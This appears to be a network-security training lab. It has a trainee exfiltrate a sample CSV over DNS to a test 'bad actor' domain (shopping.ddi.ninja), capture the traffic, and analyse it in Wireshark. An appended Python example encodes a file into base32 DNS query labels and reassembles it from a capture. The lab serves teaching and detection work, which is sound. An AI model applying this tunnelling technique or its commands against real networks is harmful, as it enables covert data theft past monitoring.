
Exfiltrating Data over DNS (2561)

This lab requires a lab environment with Threat Insight capability!
Please ensure that you have deployed the NIOS 9.0 Lab Environment (with Threat Insight).

Scenario

You are performing data exfiltration as part of a security assessment exercise. Your security team has developed an internal data exfiltration tool that includes a client and a server, utilizing the test domain shopping.ddi.ninja. Please configure the DNS server to forward queries for this test domain to the authoritative server that has been configured to receive the data, start the test client to exfiltrate data over DNS, and capture the entire transaction to include in your security assessment report.

Estimated Completion Time

  • 20 to 30 Minutes

Prerequisites

  • You must deploy the NIOS 9.0 lab environment.

Learning Content

Lab Initiation

Access jump-desktop

Once the lab is deployed, you can access the virtual machines required to complete this lab activity. To initiate the lab, click on the jump-desktop tile and login to the Linux UI:

Username: training

Password: infoblox

Initiate lab

To initiate the lab, double-click the Launch Lab icon on the Desktop.

Launch Lab

Choose the lab number from the list and click OK.

After clicking OK, you will see a pop-up message with a brief description of the lab task. If the description looks correct, click Yes to continue lab initiation.

Lab initiation will take a couple of minutes to finish.

Once complete, you will see another pop-up message with the login credentials and the URL for the Grid Manager’s User Interface. Note that the credentials may differ from those from prior labs.



Tasks

  1. Configure a DNS forward zone on the Grid for data exfiltration.

  2. Start traffic capture before data exfiltration.

  3. Perform data exfiltration in the lab environment with the provided tools.

  4. Analyze traffic capture results.

 

Task 1: Configure a DNS Forward Zone on the Grid for Data Exfiltration

Create a forward zone for shopping.ddi.ninja, the domain we will use to simulate the bad actor. Use the following settings:

  • Name: shopping.ddi.ninja

  • Forward to Name Server: support-server.ad.techblue.net

  • Name Server Address: 10.100.0.20

  • Enable Option: Use Forwarders Only

  • Member: ibns2.techblue.net

Task 2: Start Traffic Capture to Catch the Exfiltration Queries

  • Start traffic capturing on the member ibns2.techblue.net.

Task 3: Start a DNS Data Exfiltration Attack

  • On jump-desktop, open two terminal windows:

    • The first will be used to log in remotely to support-server with the command ssh training@10.100.0.20 and then run realtime-decode, which decodes and displays the exfiltrated data as it is received in real time.

    • The second will be used to start exfiltrating data from the victim (jump-desktop) towards the bad actor (shopping.ddi.ninja) using the command analytics-test 10.200.0.105.

Task 4: Observe and Analyze Data Capture Results

  • Observe the exfiltrated data obtained by the bad actor, support-server.

  • Stop the traffic capture, download the captured file from ibns2.techblue.net, open the capture file with Wireshark, and analyze the results.

  • You may enter this filter into Wireshark to display only DNS traffic involving the IP address 10.200.0.105 (ibns2) for the domain shopping.ddi.ninja:

dns and ip.addr == 10.200.0.105 and dns.qry.name contains shopping.ddi.ninja

This lab only provides instructions to exfiltrate data over DNS. To see how it can be detected and stopped, refer to the instructions in Lab 2565.


Solutions

Task 1 Solution: Configure a DNS Forward Zone on the Grid for Data Exfiltration

  1. On the jump-desktop machine, open a browser window and browse to https://10.100.0.100.

  2. Click Data Management → DNS → Zones.

  3. Click the plus (+) icon.

  4. Select Forward Zone from the drop-down menu.

  5. Select Add a forward-mapping zone and click Next.

  6. Enter shopping.ddi.ninja as the zone's name and click Next.

  7. Click the Plus(+) icon.

  8. Add the name server support-server.ad.techblue.net with the IP address 10.100.0.20.

  9. Check the Use Forwarders Only checkbox and click Next.

  10. Select Use this set of name servers.

  11. Select ibns2.techblue.net from the list.

  12. Click Save & Close.

  13. Restart services when prompted.

  14. Open a terminal window.

  15. Use the command dig @10.200.0.105 xyz.shopping.ddi.ninja. A to verify the DNS forward zone was configured correctly.

    • Querying ibns2.techblue.net (10.200.0.105) for the A record of xyz.shopping.ddi.ninja should return a NOERROR response, which confirms that the member forwarded the query to support-server and got an answer back. A SERVFAIL or a timeout means the member could not reach the forwarder at 10.100.0.20; with Use Forwarders Only enabled, it will not fall back to recursion.


Task 2 Solution: Start Traffic Capture before Data Exfiltration

  1. Navigate to Grid → Grid Manager.

  2. From the Toolbar, click Traffic Capture.

  3. Click the Plus (+) icon to add ibns2.techblue.net in the Members section.

  4. Click the Start icon in the Capture Control section to begin data capture.


Task 3 Solution: Start a DNS Data Exfiltration Attack

  1. Examine the content of the data that we will exfiltrate by using the command: more /mnt/shared/Dex/Short-Analytics-Test-File.csv.

  2. Open a terminal window and log in to the support server using the command ssh training@10.100.0.20 and the password infoblox.

  3. Enter the command realtime-decode.

  4. Open a second terminal window and issue the data exfiltration command: analytics-test 10.200.0.105.

    • This exfiltrates the sample CSV file by querying the DNS server 10.200.0.105 (ibns2).


Task 4 Solution: Observe and Analyze Data Capture Results

  1. Observe the terminal window running the exfiltration attack.

    • We should see a received response message, which means that our bad actor, support-server, was able to receive the queries from the victim.

  2. Observe the terminal window logged in to support-server and check the output of the realtime-decode command.

    • We should be able to see decoded exfiltrated entries matching the data from the sample file we opened earlier.

  3. On the Grid, click the stop icon to stop the traffic capture.

  4. Select the checkbox next to ibns2.techblue.net under Members.

  5. Click the Download button and save the file.

  6. Open the capture file with Wireshark and analyze the results.

  7. Use the following Wireshark filter: dns and ip.addr == 10.200.0.105 and dns.qry.name contains shopping.ddi.ninja

    • Note the following IP addresses:

      • 10.35.22.10: The DNS client, jump-desktop.

      • 10.200.0.105: The recursive DNS server, ibns2.techblue.net.

      • 10.100.0.20: The (malicious) authoritative DNS server for shopping.ddi.ninja, support-server.

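The analytics-test client and the realtime-decode receiver used in Task 3 are lab-internal tools, so the following is an added example, not the lab's own code and not the format those tools use. It shows the mechanics the lab relies on: a sender that splits a file into base32 labels under shopping.ddi.ninja, and a receiver that applies the equivalent of the Wireshark filter from step 7 to a capture and reassembles the data. The encoding scheme, the 30-byte chunk size, the packet dictionary layout, the function names and the sample CSV are all assumptions made for this example; the IP addresses are the ones listed in step 7.

```python
"""Added example: minimal DNS-exfiltration sender and capture-side decoder.

Stand-in for the lab's analytics-test / realtime-decode tools; the encoding
(base32 chunks, sequence-number label) is an assumption, not their format.
"""
from __future__ import annotations

import base64
import binascii
import re

EXFIL_DOMAIN = "shopping.ddi.ninja"   # test domain used in the lab
CLIENT_IP = "10.35.22.10"             # jump-desktop (DNS client)
RECURSOR_IP = "10.200.0.105"          # ibns2.techblue.net (forwarding member)
AUTH_IP = "10.100.0.20"               # support-server (receiving authoritative server)

MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # practical limit on a textual fully qualified name

# Constructed sample standing in for Short-Analytics-Test-File.csv
SAMPLE_CSV = b"id,customer,total\n1,alice,42.50\n2,bob,13.99\n3,carol,7.25\n"


def encode_queries(data: bytes, domain: str = EXFIL_DOMAIN, chunk_size: int = 30) -> list[str]:
    """Turn data into query names of the form <seq>.<base32 chunk>.<domain>.

    base32 rather than base64 because DNS names are case-insensitive and a
    resolver may change the case on the way; the leading sequence label lets
    the receiver reorder chunks and drop duplicates (retries, forwarded copies).
    30 bytes -> 48 base32 characters, within the 63-octet label limit.
    """
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk_size)):
        chunk = data[offset:offset + chunk_size]
        label = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
        if len(label) > MAX_LABEL:
            raise ValueError("chunk_size too large for a single DNS label")
        name = f"{seq}.{label}.{domain}"
        if len(name) > MAX_NAME:
            raise ValueError("query name exceeds the maximum name length")
        names.append(name)
    return names


def matches_filter(pkt: dict, resolver_ip: str = RECURSOR_IP, domain: str = EXFIL_DOMAIN) -> bool:
    """Python equivalent of the Wireshark filter from step 7:
    dns and ip.addr == 10.200.0.105 and dns.qry.name contains shopping.ddi.ninja
    (compared case-insensitively here; Wireshark's 'contains' is case-sensitive).
    """
    return (pkt.get("proto") == "dns"
            and resolver_ip in (pkt["src"], pkt["dst"])
            and domain in pkt["qname"].lower())


# <seq>.<base32 label>.<rest of name>, optional trailing dot
_QNAME_RE = re.compile(r"^(\d+)\.([a-z2-7]+)\.(.+?)\.?$", re.IGNORECASE)


def decode_capture(packets: list[dict], domain: str = EXFIL_DOMAIN) -> bytes:
    """Reassemble the exfiltrated bytes from captured DNS queries.

    The capture on ibns2 sees every query twice (jump-desktop -> ibns2 and the
    forwarded copy ibns2 -> support-server), so chunks are keyed by sequence
    number and the second copy is ignored.
    """
    chunks: dict[int, bytes] = {}
    for pkt in packets:
        if not matches_filter(pkt, domain=domain):
            continue
        m = _QNAME_RE.match(pkt["qname"])
        if not m or m.group(3).lower() != domain:
            continue
        seq, label = int(m.group(1)), m.group(2).upper()
        try:
            chunk = base64.b32decode(label + "=" * (-len(label) % 8))  # restore padding
        except binascii.Error:
            continue  # not a chunk of ours (or corrupted); skip rather than abort
        chunks.setdefault(seq, chunk)
    return b"".join(chunks[i] for i in sorted(chunks))


def simulate_capture(data: bytes) -> list[dict]:
    """Constructed packet list mimicking the capture taken on ibns2: each query
    once from the client and once forwarded, plus traffic the filter must drop."""
    pkts = [{"proto": "dns", "src": CLIENT_IP, "dst": RECURSOR_IP, "qname": "www.example.com"}]
    for name in encode_queries(data):
        pkts.append({"proto": "dns", "src": CLIENT_IP, "dst": RECURSOR_IP, "qname": name})
        pkts.append({"proto": "dns", "src": RECURSOR_IP, "dst": AUTH_IP, "qname": name})
    # same domain, but not via ibns2: must not end up in the reassembled data
    pkts.append({"proto": "dns", "src": "10.35.22.11", "dst": "10.35.22.1",
                 "qname": "99.aaaa.shopping.ddi.ninja"})
    return pkts


if __name__ == "__main__":
    for qname in encode_queries(SAMPLE_CSV):
        print(qname)
    print(decode_capture(simulate_capture(SAMPLE_CSV)).decode())
```

When you look at the real capture, the same two legs are visible for every query: one frame from 10.35.22.10 to 10.200.0.105 and one from 10.200.0.105 to 10.100.0.20 with an identical dns.qry.name. Note also that Wireshark's contains operator is case-sensitive; if a resolver in the path alters the case of query names, use dns.qry.name matches "shopping\.ddi\.ninja" instead, which is case-insensitive.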
